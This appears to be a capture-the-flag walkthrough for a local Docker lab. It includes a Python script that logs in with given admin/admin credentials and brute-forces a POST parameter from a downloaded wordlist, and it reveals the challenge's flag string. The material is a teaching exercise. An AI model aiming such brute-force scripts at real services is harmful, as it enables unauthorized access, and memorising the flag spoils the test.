Want to run this Docker container locally?

docker run -d -p 9016:5000 --restart always --name flag-i joshbeck2024/ctf-python-post-variables-flag-i

http://172.25.200.200:9016

We’ll want to intercept this session using Burp Suite.

• Need a Burp Refresher: Click Here

We are initially greeted by a login portal and are helpfully given the credentials of admin/admin

The idea:

• We want to write a program that uses POST instead of GET
• We need a parameter name of new_flag
• We need to try every word in raft-small-words.txt as a parameter value.

Download raft-small-words.txt

wget <https://raw.githubusercontent.com/danielmiessler/SecLists/refs/heads/master/Discovery/Web-Content/raft-small-words.txt>

Here is a script that will get the job done:

• This is an excellent script to save, as it logs in, preserves session state, and brute-forces a POST parameter. Good stuff here. (This code uses session = requests.Session() )

import requests

# Configuration
URL = "<http://localhost:9016>"
WORDLIST = "raft-small-words.txt"
LOGIN_USER = "admin"
LOGIN_PASS = "admin"

def solve():
    session = requests.Session()
    
    # 1. Login
    print(f"[*] Attempting to login to {URL}...")
    login_data = {
        "login_field": LOGIN_USER,
        "cred_field": LOGIN_PASS
    }
    r = session.post(URL, data=login_data)
    
    if "admin" in r.text.lower() and "dashboard" in r.url: # Heuristic check
        print("[+] Login successful!")
    elif "dashboard" in r.url or "authorized" in r.text.lower():
         print("[+] Login successful (redirect confirmed).")
    else:
        # Check if we were redirected to dashboard or stayed on index
        if "/dashboard" in r.url:
             print("[+] Login successful!")
        else:
             print("[-] Login failed. Check credentials or site status.")
             return

    # 2. Brute Force 'new_flag'
    print(f"[*] Starting brute force using {WORDLIST}...")
    
    try:
        with open(WORDLIST, "r") as f:
            words = [line.strip() for line in f.readlines()]
    except FileNotFoundError:
        print(f"[-] Error: {WORDLIST} not found.")
        return

    dashboard_url = f"{URL}/dashboard"
    
    for word in words:
        # print(f"Trying: {word}") 
        r = session.post(dashboard_url, data={"new_flag": word})
        
        if "Flag-YouGotCred" in r.text:
            print("\\n[!] SUCCESS! Flag found!")
            print(f"[!] Payload: {word}")
            print(f"[!] Flag: Flag-YouGotCred")
            return

    print("[-] Flag not found in wordlist.")

if __name__ == "__main__":
    solve()